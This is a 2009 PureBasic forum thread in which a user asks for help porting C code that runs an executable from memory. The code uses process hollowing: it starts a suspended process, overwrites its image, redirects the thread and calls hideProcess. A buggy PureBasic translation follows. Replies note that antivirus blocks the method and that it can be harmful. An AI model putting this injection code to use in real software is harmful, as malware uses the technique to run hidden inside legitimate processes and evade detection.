PureBasic Forums - English

http://www.purebasic.com
https://www.purebasic.fr/english/

Execute EXE from memory Lib

https://www.purebasic.fr/english/viewtopic.php?t=22382

Page 7 of 7

Posted: Sun Mar 22, 2009 12:42 am
by J. Baker
I take it this lib is dead? Does anyone know of an update or something similar?

Posted: Sun Mar 22, 2009 2:57 am
by Mistrel
I don't think it's possible with DEP on modern CPUs.

Posted: Sun Mar 22, 2009 4:53 am
by Poshu
Too bad, it could be usefull from time to time.

Posted: Tue Apr 07, 2009 1:44 pm
by ALAN-MHz
i want to try this source that i found on net, but i make mistakes in convert to purebasic, can anyone help me ?

Code: Select all

void RunFromMemory(char* pImage,char* pPath)
{
    DWORD dwWritten = 0;
    DWORD dwHeader = 0;
    DWORD dwImageSize = 0;
    DWORD dwSectionCount = 0;
    DWORD dwSectionSize = 0;
    DWORD firstSection = 0;
    DWORD previousProtection = 0;
    DWORD jmpSize = 0;

    IMAGE_NT_HEADERS INH;
    IMAGE_DOS_HEADER IDH;
    IMAGE_SECTION_HEADER Sections[1000];

    PROCESS_INFORMATION peProcessInformation;
    STARTUPINFO peStartUpInformation;
    CONTEXT pContext;

    char* pMemory;
    char* pFile;
    memcpy(&IDH,pImage,sizeof(IDH));
    memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
        
    dwImageSize = INH.OptionalHeader.SizeOfImage;
    pMemory = (char*)malloc(dwImageSize);
    memset(pMemory,0,dwImageSize);
    pFile = pMemory;

    dwHeader = INH.OptionalHeader.SizeOfHeaders;
    firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
    memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

    memcpy(pFile,pImage,dwHeader);

    if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders;
    }
    else
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }

    pFile = (char*)((DWORD)pFile + jmpSize);

    for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
    {
        jmpSize = 0;
        dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
        memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);
        
        if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
        }
        else
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);
    }


    memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
    memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
    memset(&pContext,0,sizeof(CONTEXT));

    peStartUpInformation.cb = sizeof(peStartUpInformation);
    if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
    {
        hideProcess(peProcessInformation.dwProcessId);
        startHook(peProcessInformation.hProcess);
        pContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
        pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
        SetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
        ResumeThread(peProcessInformation.hThread);
    }
    free(pMemory);
}
my purebasic conversion (that not work):

Code: Select all

Structure IMAGE_SECTION_HEADER
 Name.b[8]
 StructureUnion
 PhysicalAddress.l
 VirtualSize.l
 EndStructureUnion
 VirtualAddress.l
 SizeOfRawData.l
 PointerToRawData.l
 PointerToRelocations.l
 PointerToLinenumbers.l
 NumberOfRelocations.w
 NumberOfLinenumbers.w
 Characteristics.l
EndStructure 

Procedure RunFromMemory ( *pImage , *pPath )

 Protected dwWritten.l = 0
 Protected dwHeader.l = 0
 Protected dwImageSize.l = 0
 Protected dwSectionCount.l = 0
 Protected dwSectionSize.l = 0
 Protected firstSection.l = 0
 Protected previousProtection.l = 0
 Protected jmpSize.l = 0
 
 Structure IMAGE_SECTION_HEADERS
  a.IMAGE_SECTION_HEADER[1000]
 EndStructure 
 
 *INH.IMAGE_NT_HEADERS
 *IDH.IMAGE_DOS_HEADER
 peProcessInformation.PROCESS_INFORMATION
 peStartUpInformation.STARTUPINFO
 pContext.CONTEXT
 *Sections.IMAGE_SECTION_HEADERS 
 *pMemory
 *pFile
 
 CopyMemory ( @IDH , *pImage , SizeOf(*IDH) )
 CopyMemory ( @INH , ( *pImage + *IDH\e_lfanew ) , SizeOf(*INH) )
 
 dwImageSize = *INH\OptionalHeader\SizeOfImage
 *pMemory = AllocateMemory ( dwImageSize )
 *pFile = *pMemory
 
 dwHeader = *INH\OptionalHeader\SizeOfHeaders
 firstSection = *pImage + *IDH\e_lfanew + SizeOf ( IMAGE_NT_HEADERS )
 CopyMemory ( *Sections , firstSection , ( SizeOf(IMAGE_SECTION_HEADER) * *INH\FileHeader\NumberOfSections ) )
 
 CopyMemory ( *pFile , *pImage , dwHeader )
 
 If *INH\OptionalHeader\SizeOfHeaders % *INH\OptionalHeader\SectionAlignment = 0
  jmpSize = *INH\OptionalHeader\SizeOfHeaders
 Else
  jmpSize = *INH\OptionalHeader\SizeOfHeaders / *INH\OptionalHeader\SectionAlignment
  jmpSize + 1
  jmpSize * *INH\OptionalHeader\SectionAlignment
 EndIf
 
 *pFile + jmpSize
 
 For dwSectionCount = 0 To ( *INH\FileHeader\NumberOfSections - 1 )
  jmpSize = 0
  dwSectionSize = *Sections\a[dwSectionCount]\SizeOfRawData
  CopyMemory ( *pFile , ( *pImage + *Sections\a[dwSectionCount]\PointerToRawData ) , dwSectionSize )
  
  If *Sections\a[dwSectionCount]\VirtualSize % *INH\OptionalHeader\SectionAlignment = 0
   jmpSize = *Sections\a[dwSectionCount]\VirtualSize
  Else
   jmpSize = *Sections\a[dwSectionCount]\VirtualSize / *INH\OptionalHeader\SectionAlignment
   jmpSize + 1
   jmpSize * *INH\OptionalHeader\SectionAlignment
  EndIf
  
  *pFile + jmpSize
 Next

 peStartUpInformation\cb = SizeOf(peStartUpInformation)
 If CreateProcess_ ( #NUL , *pPath , @secAttrib , #NUL , #False , #CREATE_SUSPENDED , #NUL , #NUL , @peStartUpInformation , @peProcessInformation )
  pContext\ContextFlags = #CONTEXT_FULL
  getthreadcontext_ ( peProcessInformation\hThread , @pContext )
  virtualprotectex_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , dwImageSize , #PAGE_EXECUTE_READWRITE , @previousProtection )
  WriteProcessMemory_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , *pMemory , dwImageSize , @dwWritten )
  WriteProcessMemory_ ( peProcessInformation\hProcess , ( pContext\Ebx + 8) , *INH\OptionalHeader\ImageBase , 4 , @dwWritten )
  pContext\Eax = *INH\OptionalHeader\ImageBase + *INH\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_( peProcessInformation\hThread , @Context )
  virtualprotectex_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , dwImageSize , previousProtection , 0 )
  ResumeThread_ ( peProcessInformation\hThread )
 EndIf 

 FreeMemory ( *pMemory )
EndProcedure

Posted: Wed Apr 08, 2009 10:33 pm
by fsw
What's wrong with that :?:
http://www.purebasic.fr/english/viewtop ... c&start=61

It's there for several years.

Some AV software might not allow to run this piece of code though...

Posted: Wed Apr 08, 2009 11:05 pm
by ts-soft
fsw wrote:What's wrong with that :?:
http://www.purebasic.fr/english/viewtop ... c&start=61

It's there for several years.

Some AV software might not allow to run this piece of code though...
It doesn't work on most PC, since several years :wink:

greetings

Thomas

Posted: Thu Apr 09, 2009 8:44 am
by ALAN-MHz
so there isn't a real solution for xp sp3 and vista actually ?

Posted: Mon Apr 20, 2009 4:36 pm
by Sandra M.
BoxedApp SDK ( http://boxedapp.com/boxedappsdk/ ) is able to launch exe from memory... But it's not free :oops:

Posted: Mon Apr 20, 2009 4:37 pm
by Sandra M.
fsw wrote:Some AV software might not allow to run this piece of code though...
Yeah, they don't like SetThreadContext ;)

Posted: Fri May 08, 2009 1:01 pm
by SFSxOI
OK, I have another stupid question. Why would you want to load the .exe into memory first then launch it rather then just launching it from the beginning?

Posted: Sat May 09, 2009 7:11 am
by Poshu
Well, it might (sometime) be useful to launch an exe wich is embedded in another one...

Sure, it might (sometime too) be harmful too...

Posted: Sat May 09, 2009 11:26 am
by thanos
Poshu wrote:Well, it might (sometime) be useful to launch an exe wich is embedded in another one...

Sure, it might (sometime too) be harmful too...
Due to installed antivirus programs this solution is not working many times.
Regards.

Thanos
All times are UTC+01:00
Page 7 of 7

Powered by phpBB® Forum Software © phpBB Limited